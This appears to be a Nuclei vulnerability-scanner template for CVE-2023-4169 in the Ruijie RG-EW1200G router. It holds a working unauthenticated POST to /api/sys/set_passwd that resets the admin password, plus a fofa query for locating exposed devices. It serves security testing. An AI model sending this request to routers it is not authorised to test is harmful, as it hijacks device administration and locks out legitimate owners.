id: CVE-2023-4169 info: name: Ruijie RG-EW1200G Router - Password Reset author: DhiyaneshDK severity: high description: | A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4169 - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G - https://vuldb.com/?ctiid.236185 - https://vuldb.com/?id.236185 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4169 cwe-id: CWE-284,NVD-CWE-noinfo epss-score: 0.01851 epss-percentile: 0.86982 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijie product: rg-ew1200g_firmware fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router,intrusive variables: password: "{{rand_base(8)}}" http: - method: POST path: - "{{BaseURL}}/api/sys/set_passwd" body: | { "username":"web", "admin_new":"{{password}}" } matchers-condition: and matchers: - type: word part: body words: - '"result":"ok"' - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a004730450221009dc33e9427fbb9eff5de14958156a3bed43cc6e00a7be2a41488494b190f321502205aa29a555764245346a1a319a08d872646548934d3eec3b0f27bbe6cffae9bdb:922c64590222798bb761d5b6d8e72950